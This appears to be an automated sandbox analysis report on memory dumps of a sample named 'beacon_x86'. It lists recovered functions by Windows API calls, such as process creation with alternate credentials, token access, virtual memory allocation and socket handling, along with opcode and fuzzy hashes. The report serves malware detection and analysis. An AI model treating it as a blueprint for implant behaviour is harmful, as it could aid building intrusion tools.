          • Opcode ID: a8d59b9f323fa2a4c5ee94e6dc0200af2b82ded2e9470af3a7c780d8d59ac434
          • Instruction ID: 98cf07bab3d6218a46d768dc0bef741341b5c7bd7f093d516768e897f3c58bad
          • Opcode Fuzzy Hash: a8d59b9f323fa2a4c5ee94e6dc0200af2b82ded2e9470af3a7c780d8d59ac434
          • Instruction Fuzzy Hash: DC41A472900308BBDF11BBA4CC86F9EBBB8EF08714F14452AF514B2292EA7596549B71
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 16067a2b2defe229e1165cabba65462480f8585182f6c99a0e3bf517379f6725
          • Instruction ID: a2a31d4df63dc539ad20373795f8365041ac073e8a58b3a5808173bd848b4b2f
          • Opcode Fuzzy Hash: 16067a2b2defe229e1165cabba65462480f8585182f6c99a0e3bf517379f6725
          • Instruction Fuzzy Hash: 53418F76C04109BBDF01BFE4DC42DEEBBB8EF44324F144026F814A6252EB359A54ABB4
          APIs
          • __flush.LIBCMT ref: 00D782F3
          • __fileno.LIBCMT ref: 00D78313
          • __locking.LIBCMT ref: 00D7831A
          • __flsbuf.LIBCMT ref: 00D78345
            • Part of subcall function 00D79641: __getptd_noexit.LIBCMT ref: 00D79641
            • Part of subcall function 00D7B5DA: __decode_pointer.LIBCMT ref: 00D7B5E5
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
          • String ID:
          • API String ID: 3240763771-0
          • Opcode ID: 8389aba4a4771f7c3f6f0b103eec35a22577fe35531c466181d277ee51952c57
          • Instruction ID: 031b850cb27dd944884306c44119e97b8a850eeb7a05069e5beff2b7cac5500a
          • Opcode Fuzzy Hash: 8389aba4a4771f7c3f6f0b103eec35a22577fe35531c466181d277ee51952c57
          • Instruction Fuzzy Hash: B041C331A40B05DFDB249FA9888859EB7B2EF80720F28C269E45DD7541FB70DE40AB74
          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
          • _memset.LIBCMT ref: 00D63BDD
          • GetStartupInfoA.KERNEL32(?), ref: 00D63BF5
          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,00D622CF), ref: 00D63C8F
          • GetLastError.KERNEL32 ref: 00D63C9E
            • Part of subcall function 00D616E2: _vswprintf_s.LIBCMT ref: 00D616FE
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
          • String ID:
          • API String ID: 709525413-0
          • Opcode ID: c297b68ced4b71eb6d1f13605dc924ae2f83f012de2d1694eed0c160b6f3bcfb
          • Instruction ID: 791dd47b69db8b49c60a8be9bcd15c5076c29fc5b47c0ccc1d9ac474151611eb
          • Opcode Fuzzy Hash: c297b68ced4b71eb6d1f13605dc924ae2f83f012de2d1694eed0c160b6f3bcfb
          • Instruction Fuzzy Hash: 5A412571900208BBDF01AFAADC45EEFBFB9EF49750F104016F618A6261D7758A10DB75
          APIs
          • __time64.LIBCMT ref: 00D6BC7B
            • Part of subcall function 00D78E8E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00D6BB2D,00000000,00000080,?,?,?,00D603F0,?,00000000,00000000,00000000,00000000), ref: 00D78E99
            • Part of subcall function 00D78E8E: __aulldiv.LIBCMT ref: 00D78EB9
          • __time64.LIBCMT ref: 00D6BC96
          • __time64.LIBCMT ref: 00D6BD26
          • __time64.LIBCMT ref: 00D6BD8A
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __time64$Time$FileSystem__aulldiv
          • String ID:
          • API String ID: 4218076520-0
          • Opcode ID: 88fc2899c87e11055618cf3b761bad6944d13ebadb6f98dc293141b56189e720
          • Instruction ID: 87065aee8443241206f64a0402e8d2969080624a42cb7624b9b5bcb70cc103af
          • Opcode Fuzzy Hash: 88fc2899c87e11055618cf3b761bad6944d13ebadb6f98dc293141b56189e720
          • Instruction Fuzzy Hash: ED4137B5900704CFC325CF69E982469BBF4FB98321728862FE1AACA364D7705980DF71
          APIs
          • GetModuleHandleA.KERNEL32(00D90690,00D9067C,00000000,00000000), ref: 00D65704
          • GetProcAddress.KERNEL32(00000000), ref: 00D6570B
            • Part of subcall function 00D65638: _malloc.LIBCMT ref: 00D65657
          • Thread32Next.KERNEL32(00000000,0000001C), ref: 00D6578E
          • Sleep.KERNEL32(000000C8,00000000,0000001C,00000000,0000001C,00000004,00000000), ref: 00D657A4
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AddressHandleModuleNextProcSleepThread32_malloc
          • String ID:
          • API String ID: 788978452-0
          • Opcode ID: 03d696d4934a88bc8194d7086a7b710eda3a99470408bf2e496721dd53786faf
          • Instruction ID: 21deaecb91e17466ef5a9b84bb72b2ae402938aa6d10294b2500ab3efbd6eecd
          • Opcode Fuzzy Hash: 03d696d4934a88bc8194d7086a7b710eda3a99470408bf2e496721dd53786faf
          • Instruction Fuzzy Hash: 89314D71900218BFDF10EFA4EC45AEEBBB9EB44710F144425FA05E7154E7709A95CBB1
          APIs
          • _memset.LIBCMT ref: 00D6631D
          • _memset.LIBCMT ref: 00D66335
            • Part of subcall function 00D66260: GetLastError.KERNEL32(-0000EA60,00000000,?,00D627B2,?), ref: 00D6627A
          • Sleep.KERNEL32(000001F4), ref: 00D663C8
          • GetLastError.KERNEL32 ref: 00D663D4
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLast_memset$Sleep
          • String ID:
          • API String ID: 4288913296-0
          • Opcode ID: 03720ae97c708a06102c81d7eadac7d80e7f84f8fd7cac4f36a618b58d87c4fc
          • Instruction ID: 3add8685b786dd0dd4c7ab1d3336e8c5dd7561ddb1c9e77e14d52eb533328a7a
          • Opcode Fuzzy Hash: 03720ae97c708a06102c81d7eadac7d80e7f84f8fd7cac4f36a618b58d87c4fc
          • Instruction Fuzzy Hash: B431607690431D6FDF11ABE4DC82EEE77BCEB08314F080066F614A6182EA35DA188775
          APIs
          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D8290C
          • __isleadbyte_l.LIBCMT ref: 00D82940
          • MultiByteToWideChar.KERNEL32(DA2A2035,00000009,00D90534,FFFFFB50,00D90534,00000000,?,?,?,00D61A3F,00D90534,00D90534,00000000), ref: 00D82971
          • MultiByteToWideChar.KERNEL32(DA2A2035,00000009,00D90534,00000001,00D90534,00000000,?,?,?,00D61A3F,00D90534,00D90534,00000000), ref: 00D829DF
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
          • String ID:
          • API String ID: 3058430110-0
          • Opcode ID: 8cde108e12180358b75379549207ea0c15258352bded68de0400c671679f4011
          • Instruction ID: 3be0547afff1677bb08adb3afa5163efc2e3f251d2d2e8cbdb3579dc7df386b0
          • Opcode Fuzzy Hash: 8cde108e12180358b75379549207ea0c15258352bded68de0400c671679f4011
          • Instruction Fuzzy Hash: 84319D31A4024AEFDB20FF68C885ABE7BA5FF01310F1985A9E4A59B191D330D940DF71
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateInfoPipeSleepStartup_memset
          • String ID:
          • API String ID: 112726305-0
          • Opcode ID: 1977be091623a6bf4f06d62d65cb11d67600b85e64c0ec9af0265fe120297b26
          • Instruction ID: aa287071485f8e7b48a0469be451a78a896f3c1aefcaaaac613b680228101d2d
          • Opcode Fuzzy Hash: 1977be091623a6bf4f06d62d65cb11d67600b85e64c0ec9af0265fe120297b26
          • Instruction Fuzzy Hash: AF312A7280020DAFDF01EFA8DD45ADEBBB9FF08314F104116F914B6151EB729A55DB61
          APIs
          • _memset.LIBCMT ref: 00D65C39
          • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 00D65C52
          • SetLastError.KERNEL32(00000005,?,?,00000000), ref: 00D65C77
            • Part of subcall function 00D6C320: GetCurrentProcess.KERNEL32(00000000,00D655ED,?,?,?,00D65A04,00000000,00000000,00000000,?,00000000,00D655ED,00000000,00000000,00000000), ref: 00D6C369
            • Part of subcall function 00D6C320: NtAllocateVirtualMemory.NTDLL(?,00000000,00000000,?,00003000,00000000), ref: 00D6C384
            • Part of subcall function 00D6C320: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000000,00000000,00D655ED,?,?,?,00D65A04,00000000,00000000,00000000,?,00000000,00D655ED), ref: 00D6C3CA
          • SetLastError.KERNEL32(00000006,?,?,00000000), ref: 00D65CF4
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLastVirtual$AllocAllocateCurrentMemoryProcessVersion_memset
          • String ID:
          • API String ID: 1286918773-0
          • Opcode ID: 19a505bfe7c342c6f372c79a683a61e0fc4f581de71424aeef5534ed7717361a
          • Instruction ID: 133566f5b7422d522935249e86ff3df9e121e2442ac6287460531d9ed99cba25
          • Opcode Fuzzy Hash: 19a505bfe7c342c6f372c79a683a61e0fc4f581de71424aeef5534ed7717361a
          • Instruction Fuzzy Hash: 0821F872A10714AFDB30DB74AC46B9B77A4EF04720F150065FA4EEB285DA709A858BB0
          APIs
          • GetLastError.KERNEL32 ref: 00D6851B
          • UpdateProcThreadAttribute.KERNELBASE(?,00000000,00020000,?,00000004,00000000,00000000), ref: 00D68549
          • GetLastError.KERNEL32 ref: 00D68553
          • GetCurrentProcess.KERNEL32(00000000,00000000,?), ref: 00D68588
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLast$AttributeCurrentProcProcessThreadUpdate
          • String ID:
          • API String ID: 3105217703-0
          • Opcode ID: d27e9e16d1ccdb3e6e49ce7b3099a2dc5622617332ee3224266d91c644b1fe2c
          • Instruction ID: eb92797c4fa188528dc6c2364a0cd5705c0b62b1ff3b99f79412c76f7a68f696
          • Opcode Fuzzy Hash: d27e9e16d1ccdb3e6e49ce7b3099a2dc5622617332ee3224266d91c644b1fe2c
          • Instruction Fuzzy Hash: 5E2160B6610304BFEB14AFA8DC4AD7B33ACEB08750B18191DFA06D3241EA70ED109B71
          APIs
          • _malloc.LIBCMT ref: 00D66033
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • htonl.WS2_32(?), ref: 00D66048
          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00D660AF
          • _memset.LIBCMT ref: 00D660E0
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateHeapObjectSingleWait_malloc_memsethtonl
          • String ID:
          • API String ID: 3856049160-0
          • Opcode ID: 86f75236161b853c113a9db91b4568b2828bf246070ad0c79c58977c1c7f7769
          • Instruction ID: 881793a0ca4f35a135c3cf888bde5511b391b87bb44b7482bc19ec665d04bf2d
          • Opcode Fuzzy Hash: 86f75236161b853c113a9db91b4568b2828bf246070ad0c79c58977c1c7f7769
          • Instruction Fuzzy Hash: 5721F271900200EBDF20AFA8D886A6A77B8FF04760F5541B5FD44AB182E770CD8587B5
          APIs
          • _memset.LIBCMT ref: 00D622FF
          • CreatePipe.KERNEL32(?,?,?,00100000), ref: 00D62335
          • GetStartupInfoA.KERNEL32(?), ref: 00D6233F
          • WaitForSingleObject.KERNEL32(?,00002710), ref: 00D62383
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateInfoObjectPipeSingleStartupWait_memset
          • String ID:
          • API String ID: 468459245-0
          • Opcode ID: 5ae9e11e1fd34f1070f2012b2a6a18fe489576fc6ea54d326c77b4c6a62b6578
          • Instruction ID: 861c8b822290f9eb8c50ffd3633015f2ba33f9f0a196763241cdfde0cc724ae3
          • Opcode Fuzzy Hash: 5ae9e11e1fd34f1070f2012b2a6a18fe489576fc6ea54d326c77b4c6a62b6578
          • Instruction Fuzzy Hash: C32139B2C00618BFDF10DFA8DD45ADEBBB9FF08310F100126FA04E6251E7719A058BA1
          APIs
          • _malloc.LIBCMT ref: 00D6014F
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _memset.LIBCMT ref: 00D601A4
          • _memset.LIBCMT ref: 00D601B3
          • _memset.LIBCMT ref: 00D601CA
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$AllocateHeap_malloc
          • String ID:
          • API String ID: 1114209484-0
          • Opcode ID: 31a8ad4906466bab4edcd8ad1c261fba71611a44a44038fef5dc812f5f40bc51
          • Instruction ID: 09565025d2f249f467a22b9dedf54c3cc2f03d403111d100a0adc0ae53bf23d9
          • Opcode Fuzzy Hash: 31a8ad4906466bab4edcd8ad1c261fba71611a44a44038fef5dc812f5f40bc51
          • Instruction Fuzzy Hash: 1011D071600345BBD7206F24CC81AAB7F6EDF67364F180564E448D3242F3269E0583B0
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset
          • String ID:
          • API String ID: 2102423945-0
          • Opcode ID: ffeb7b3de3ffea1e17a76e0e650e9cb768e3f28beeaeaa57777a8ffe4d979dfd
          • Instruction ID: 1d5258490df1e04157cec5b4402a85e7c0bc1ccfb0de6844f635add0fbdea131
          • Opcode Fuzzy Hash: ffeb7b3de3ffea1e17a76e0e650e9cb768e3f28beeaeaa57777a8ffe4d979dfd
          • Instruction Fuzzy Hash: D40161B15052147BDB216F71DC85EAF3A9DEB49374B148037FA18D7212E7348981EBB1
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _clock
          • String ID:
          • API String ID: 876827150-0
          • Opcode ID: 908a800f1b4aee3d8470d56c238d3ac105f65cf764e8ae670c4fb01448cdafdd
          • Instruction ID: dbd862f51469f2d50654a9231ae4ad31656d97c91ca9dbe378d84bab4cf41d75
          • Opcode Fuzzy Hash: 908a800f1b4aee3d8470d56c238d3ac105f65cf764e8ae670c4fb01448cdafdd
          • Instruction Fuzzy Hash: 49015E71E04659EF8B10EFE8A4C15BDBBB5EF40384F2580BAE842A6245D7308E41CBF0
          APIs
          • Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00D606C4), ref: 00D6CE84
          • RtlExitUserThread.NTDLL(00000000,00000000,00000000,00000080,00D606C4), ref: 00D6CE8E
          • WaitForSingleObject.KERNEL32(00000000,00000000,00000080,00D606C4), ref: 00D6CEAF
          • ExitProcess.KERNEL32 ref: 00D6CEBB
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Exit$ObjectProcessSingleSleepThreadUserWait
          • String ID:
          • API String ID: 845863014-0
          • Opcode ID: a9a776e1d50ec0c966a039d0cd47e0f9e41f91fb2b0804e224a67651ae95e9cd
          • Instruction ID: a2f8524f6136f9b56f1b791996d525b5be1fa0e6284215d1f6a6052d6ec034d0
          • Opcode Fuzzy Hash: a9a776e1d50ec0c966a039d0cd47e0f9e41f91fb2b0804e224a67651ae95e9cd
          • Instruction Fuzzy Hash: 87F0F0B2798300ABF9303BBE6C8EF3F2A29DB54B66F100117F364991D2CE6648404236
          APIs
          • GetCurrentThread.KERNEL32 ref: 00D6D0AE
          • OpenThreadToken.ADVAPI32(00000000), ref: 00D6D0B5
          • GetCurrentProcess.KERNEL32(00000008,?), ref: 00D6D0C5
          • OpenProcessToken.ADVAPI32(00000000), ref: 00D6D0CC
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentOpenProcessThreadToken
          • String ID:
          • API String ID: 3974789173-0
          • Opcode ID: 4326def8d065df5099de17b02b21de5671bf876f534f242b0465d94ffe08d0bd
          • Instruction ID: 83ed2c7991b5ff6501bc21189b94c1e5b8791447c6396647c74c45634487b50d
          • Opcode Fuzzy Hash: 4326def8d065df5099de17b02b21de5671bf876f534f242b0465d94ffe08d0bd
          • Instruction Fuzzy Hash: 43F0F972A10304ABEB10ABA8ED0AFAE37A9EB04745F144056F501D51A5DAB5D9049771
          APIs
          • accept.WS2_32(?,00000000,00000000), ref: 00D6DD5D
          • send.WS2_32(00000000,?,?,00000000), ref: 00D6DD8A
          • send.WS2_32(00000000,?,?,00000000), ref: 00D6DD98
          • closesocket.WS2_32(00000000), ref: 00D6DDA3
            • Part of subcall function 00D6DCDF: closesocket.WS2_32(?), ref: 00D6DCE1
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: closesocketsend$accept
          • String ID:
          • API String ID: 2168303407-0
          • Opcode ID: db572148748788afd57beddb47ae74a2d1995f2fa57d30d2938194ea520b9d7d
          • Instruction ID: ba3d46c24534d2b754ea88673126244ea140882929f949dc83f242ffe5392cb7
          • Opcode Fuzzy Hash: db572148748788afd57beddb47ae74a2d1995f2fa57d30d2938194ea520b9d7d
          • Instruction Fuzzy Hash: 0BF0B476600704BBD6303BB4FC42F46B76EEF08730F204A56F69695493C672E8509BB8
          APIs
          • __getptd.LIBCMT ref: 00D80296
            • Part of subcall function 00D7C797: __getptd_noexit.LIBCMT ref: 00D7C79A
            • Part of subcall function 00D7C797: __amsg_exit.LIBCMT ref: 00D7C7A7
          • __getptd.LIBCMT ref: 00D802AD
          • __amsg_exit.LIBCMT ref: 00D802BB
          • __lock.LIBCMT ref: 00D802CB
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
          • String ID:
          • API String ID: 3521780317-0
          • Opcode ID: c89289a2c2ac748a1ac2efb9f971ef57a4e8aee108b339cb2741c3041abc8373
          • Instruction ID: c9d908e21f384a13df0af415d69ca5a138b01d8dc81fbd346cf7c3cd2bd028e1
          • Opcode Fuzzy Hash: c89289a2c2ac748a1ac2efb9f971ef57a4e8aee108b339cb2741c3041abc8373
          • Instruction Fuzzy Hash: 98F0B432941700EFD760FBB8840AB4C7BA0FF41720F15854AF448AB2C2DBB49909CB7A
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset
          • String ID: l.dl$ntdl
          • API String ID: 2102423945-1236859653
          • Opcode ID: fdb6297e7cbd8406269c93f82204456c1cf00d7e15b5db9edf4be9e089ab1587
          • Instruction ID: 47548beb8c232f9101247c73c00d70ddb9590da57adf47b31e4753195092ea08
          • Opcode Fuzzy Hash: fdb6297e7cbd8406269c93f82204456c1cf00d7e15b5db9edf4be9e089ab1587
          • Instruction Fuzzy Hash: 0A514D75900605DFCB20CF58C480AADB7F1FF58314F29809AD945AB361D731AD81CFA0
          APIs
          • GetCurrentProcess.KERNEL32(00004000,?,?,?,00D65D0F,00004000,?,?,?,00000000), ref: 00D6C4C7
          • VirtualFree.KERNEL32(00D652D3,00000000,00004000,00004000,?,?,?,00D65D0F,00004000,?,?,?,00000000), ref: 00D6C523
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentFreeProcessVirtual
          • String ID: p,v
          • API String ID: 2843569277-381846232
          • Opcode ID: 85a8a00b8a13c0783ad18834504298abe5e92570917de41dc4d60e26656e6e08
          • Instruction ID: 487cfc596b7d9066b476256f1e9517d3861f397f04fb12df074654cdf9a22f8c
          • Opcode Fuzzy Hash: 85a8a00b8a13c0783ad18834504298abe5e92570917de41dc4d60e26656e6e08
          • Instruction Fuzzy Hash: 1A11ADB1821314EF8B25DF44DC898BE7BB9F749B40B14441AF046D2720D770AA85DFB1
          APIs
          • _memset.LIBCMT ref: 00D6BA03
          • GetCurrentProcess.KERNEL32(00D60A51), ref: 00D6BA1D
            • Part of subcall function 00D6B960: _memset.LIBCMT ref: 00D6B97A
            • Part of subcall function 00D6B960: __snprintf.LIBCMT ref: 00D6B9D9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$CurrentProcess__snprintf
          • String ID: system32
          • API String ID: 3270679572-3483537008
          • Opcode ID: 1bc1bab3d9fc479a871c6044ec1a0b5ec60c8041ce621c519de5c519272f27d9
          • Instruction ID: 1018a63416218b7125b95d9357ae2b3b7df4d3bfb6a174dd6a7c06f8a7ede881
          • Opcode Fuzzy Hash: 1bc1bab3d9fc479a871c6044ec1a0b5ec60c8041ce621c519de5c519272f27d9
          • Instruction Fuzzy Hash: C2F05E316843046FF7146B90FC47B693798DF00724F14401BF908AA3D2FBA565808A79
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Failure
          • String ID: abcdefghijklmnop$abcdefghijklmnop
          • API String ID: 3995482717-935656707
          • Opcode ID: 4d1227ede6a145633f070787483e74cd4d58cfad1496ae03b9bb51402f780a7b
          • Instruction ID: c3a5576e9cfc101ee22ed094d5e360673ad390940dac31f6f0b67ec56a1d2658
          • Opcode Fuzzy Hash: 4d1227ede6a145633f070787483e74cd4d58cfad1496ae03b9bb51402f780a7b
          • Instruction Fuzzy Hash: C3D0C97720D2087EF920B45A7D07FBB7B6CD7C1B75FB041ABF9088508069026D2652B9
          APIs
          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022CE
          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022F5
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022FC
          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 0040231C
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: CriticalSection$EnterErrorLastLeaveValue
          • String ID:
          • API String ID: 682475483-0
          • Opcode ID: 3e49c145e7cda86df6080b1c3b5656d3cc1d329760b6f4bb8e53dbee9a39bf48
          • Instruction ID: db0b3c927cb9be537e2116d15c0f7f13df8c87252735a744e9a29fbe81bf0797
          • Opcode Fuzzy Hash: 3e49c145e7cda86df6080b1c3b5656d3cc1d329760b6f4bb8e53dbee9a39bf48
          • Instruction Fuzzy Hash: BAF0A4756007108BC7107FB8D9C861B7BA4AA48345B0505B9DE845735AE778EC08CBAA